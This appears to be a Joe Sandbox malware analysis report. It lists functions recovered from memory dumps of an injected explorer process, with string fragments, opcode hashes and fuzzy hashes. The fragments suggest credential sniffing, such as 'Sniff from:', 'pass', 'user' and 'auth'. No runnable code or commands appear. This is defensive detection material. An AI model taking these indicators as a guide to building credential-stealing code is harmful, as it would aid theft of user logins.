                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 2.dl$dll$l32.$ole3$shel
                                                                                                                                                                                                        • API String ID: 0-1970020201
                                                                                                                                                                                                        • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                                        • Instruction ID: d69659543e1194ee97ef3df69ec1b250576ea78bca0b7bb35656d24073058e0b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA513BB0918B4D8BDB64DFA4C045AEEB7E1FF58304F40462E959AE7214EF70A5418B89
                                                                                                                                                                                                        Function 110D586F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                                                        • API String ID: 0-1610437797
                                                                                                                                                                                                        • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                                        • Instruction ID: 7f8b29de8e0cd0136b4fadf65227fe3d9c2a056b0862e5c917023fda409626fb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C41A234A28B4D8FDB65EF689845BEAB7E4FB98305F40462E984EC7240EF31D5058782
                                                                                                                                                                                                        Function 1167B86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 4$\$dll$ion.$vers
                                                                                                                                                                                                        • API String ID: 0-1610437797
                                                                                                                                                                                                        • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                                        • Instruction ID: 38c8e5a8c7006d29320d63d92ab7ecff385926f3ab32ec2b0f2e72fd08effc03
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B41A034219B8D8FDBA5EF28C8457EAB7E1FB98305F40462E999EC7240EF31D5458782
                                                                                                                                                                                                        Function 110D74B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                                                        • API String ID: 0-327345718
                                                                                                                                                                                                        • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                                        • Instruction ID: 709007ede93699aeee9de34d367a9ba2e04b19dcc580a3325b969df8b455e13a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97415930A18F8E8FCF94EF6880957AD77E1FF68304F90016AE80ED7254DA71D9408B82
                                                                                                                                                                                                        Function 1167D4B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 32.d$cli.$dll$sspi$user
                                                                                                                                                                                                        • API String ID: 0-327345718
                                                                                                                                                                                                        • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                                        • Instruction ID: 6fee9a5ed51f281f46affc574f420aeba10626a66d50677914788b9563efe9f0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0418F31A19F0D8FDB48EF68C0957AD77E2FB68304F51096AE80ED7210DA72D5408BC6
                                                                                                                                                                                                        Function 110D5432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .dll$el32$h$kern
                                                                                                                                                                                                        • API String ID: 0-4264704552
                                                                                                                                                                                                        • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                                        • Instruction ID: ecfd54ce8f2ac36404fe5060d9989200145bf53401baee58da0a80ebddd2a8e1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3A418570A08B498FDB55DF2880983AABBE1FB98304F50466F989EC7255DF70D545CB42
                                                                                                                                                                                                        Function 1167B432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .dll$el32$h$kern
                                                                                                                                                                                                        • API String ID: 0-4264704552
                                                                                                                                                                                                        • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                                        • Instruction ID: bb562c377aa4104eb938a8e5e98e9d7b111a656f91bb45654773084b82579e86
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61418F70608B498FD7A9DF2884843ABBBE1FB98304F104A2ED59EC3265DF71D545CB85
                                                                                                                                                                                                        Function 110DC0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $Snif$f fr$om:
                                                                                                                                                                                                        • API String ID: 0-3434893486
                                                                                                                                                                                                        • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                                        • Instruction ID: bc202cc2accb8d614e75240ea70cac153553853c7eca4aa35e10afc627ebff72
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3731247590DB885FD71ADB28C4886EABBD0FB94300F50491EE49BC7252EE31B50ACB43
                                                                                                                                                                                                        Function 116820B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $Snif$f fr$om:
                                                                                                                                                                                                        • API String ID: 0-3434893486
                                                                                                                                                                                                        • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                                        • Instruction ID: e28a503e6afec3cf95a9beecaef47ee55db9f8c636d0d7ed11849644541b445d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7331227551DB88AFD71ADF28C0846DAB7D1FB84300F50491EE49BC7291EE32A64ACB47
                                                                                                                                                                                                        Function 110DC0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $Snif$f fr$om:
                                                                                                                                                                                                        • API String ID: 0-3434893486
                                                                                                                                                                                                        • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                                        • Instruction ID: 402d45dc7457f5455e374204ca9050c15d72c0217153d96a8a05eefe02603072
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9131E17590DB486FD719DB28C4846EAB7D4FB94300F40491EE49BC3255EE31E50ACB43
                                                                                                                                                                                                        Function 116820C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $Snif$f fr$om:
                                                                                                                                                                                                        • API String ID: 0-3434893486
                                                                                                                                                                                                        • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                                        • Instruction ID: ed2460c2e2809aa10c7639f423c901107edcf2ad83ed68816e1916ba357d139b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 17312075419B48AFD71ADF28C484AEAB7D1FB94300F50491EE4ABC3285EE31E54ACB47
                                                                                                                                                                                                        Function 110D7FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                                        • API String ID: 0-3136806129
                                                                                                                                                                                                        • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                                        • Instruction ID: 65724fdeca9a02ee8eef96af743e3210e5694acf5bd46c28af52c3946fe46c45
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AA318134918B494FCB85EF698495BAAB7E1FF98304F80466DA44ECB254DF30E505C752
                                                                                                                                                                                                        Function 1167DFC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                                        • API String ID: 0-3136806129
                                                                                                                                                                                                        • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                                        • Instruction ID: 8a3b25d29a24991cb6a0bc396f4b0b983e16a2e7c37757b5c0383dcb76207af0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9531AE30119B598FCB85EF688494BAAB7E2FFD8304F84062D944ECB254DF32D945CB96
                                                                                                                                                                                                        Function 110D7FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                                        • API String ID: 0-3136806129
                                                                                                                                                                                                        • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                                        • Instruction ID: 7fabae6b458540d7bb15aa28c4b2ed568ec5ae20b264b2f9c34170c1064bb3a0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DC31A034A18B494FCB84DF688494BAAB7E1FF98304F80466DE44ECB254DF30E505C742
                                                                                                                                                                                                        Function 1167DFBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .dll$chro$hild$me_c
                                                                                                                                                                                                        • API String ID: 0-3136806129
                                                                                                                                                                                                        • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                                        • Instruction ID: 1e2c9d7755033aed457fe958185103e0b823a122fd672d393a3867366ca9ad14
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE31AD30119B198FCB84DF688494BAAB7E2FF98304F84062D944ECB254DF32D905CB56
                                                                                                                                                                                                        Function 110DA8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                        • API String ID: 0-319646191
                                                                                                                                                                                                        • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                        • Instruction ID: b1616177539a963684ade116eac2aca8c1e4a59c5534ff51e2936ffa2b049fdc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD31C031B14B4D8FCF04EFA9D8887EEBBE0FB58205F40422AE44ED7240DE7496458799
                                                                                                                                                                                                        Function 116808C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                        • API String ID: 0-319646191
                                                                                                                                                                                                        • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                        • Instruction ID: ceb5da33d43e311a58448ccc9e917666c34137062999222f613f9d64ef5ea3f3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B031DF71614B5D8BCF05EFA8C8847EEBBE1FB58218F40022AD45ED7240DF799A45C789
                                                                                                                                                                                                        Function 110DA8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                        • API String ID: 0-319646191
                                                                                                                                                                                                        • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                        • Instruction ID: be1fb8f7dc2af5c1de78b2aae219621a0c5f508ad3073151f16aa528c672eb13
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7321C374A14B4D8ECF05EFA9C8887EDBBE0FF58205F40421AE45AD7240DE7496458799
                                                                                                                                                                                                        Function 116808BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                                        • API String ID: 0-319646191
                                                                                                                                                                                                        • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                        • Instruction ID: 691a08f2539ededca0b2b8850dd353d65c1e4f0755e8fad80bd6466900dc4fcc
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6210170A14B4D8BCF05EFA8C8847EDBBE1FF58218F40422AD45AD7240DF799645CB89
                                                                                                                                                                                                        Function 110DBE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .$l$l$t
                                                                                                                                                                                                        • API String ID: 0-168566397
                                                                                                                                                                                                        • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                                        • Instruction ID: 32b8d24afd19bd7fbf0cdc110ef9a44c0561d6aeac53f95faeff00757dd8c28c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B216B74A24B0E9FDB08EFA8D0487EDBBF1FB18304F50462ED009D3600DB75A5918B84
                                                                                                                                                                                                        Function 110DBE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .$l$l$t
                                                                                                                                                                                                        • API String ID: 0-168566397
                                                                                                                                                                                                        • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                                        • Instruction ID: ea0655fcfe074ba5ea54993f2ba7294fb3d2df894547506eb3e927e9ff284509
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB215A74A24B0E9FDB48EFA8D0487EEBAF1FB58304F50462ED009D3610DB75A5918B84
                                                                                                                                                                                                        Function 11681E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .$l$l$t
                                                                                                                                                                                                        • API String ID: 0-168566397
                                                                                                                                                                                                        • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                                        • Instruction ID: e2c8e4ab672b1e1f80ac26b91e6b6288139d79b5bca0e3684e6f780d6814ad49
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE217C74A24F0E9FDB04EFA8D0447ADBAF1FB58314F50462ED009D3610DB79A591CB88
                                                                                                                                                                                                        Function 11681E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235657630.0000000011630000.00000040.80000000.00040000.00000000.sdmp, Offset: 11630000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11630000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: .$l$l$t
                                                                                                                                                                                                        • API String ID: 0-168566397
                                                                                                                                                                                                        • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                                        • Instruction ID: 444ea47870cf972a6c4db767774a8597455e7f8efc43c40884d5df1eed35c6b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A215C75A24F0E9BDB04EFA8D0447E9BBF1FB58314F50462DD049D3610DB79A5918B88
                                                                                                                                                                                                        Function 110DBFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.35235420208.0000000011030000.00000040.00000001.00040000.00000000.sdmp, Offset: 11030000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_11030000_explorer.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: auth$logi$pass$user
                                                                                                                                                                                                        • API String ID: 0-2393853802
                                                                                                                                                                                                        • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                                        • Instruction ID: 5e83fbdb09a5e6c37d9dba8322f3c0e14595f73a0642f8683e64567fb51b3584
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
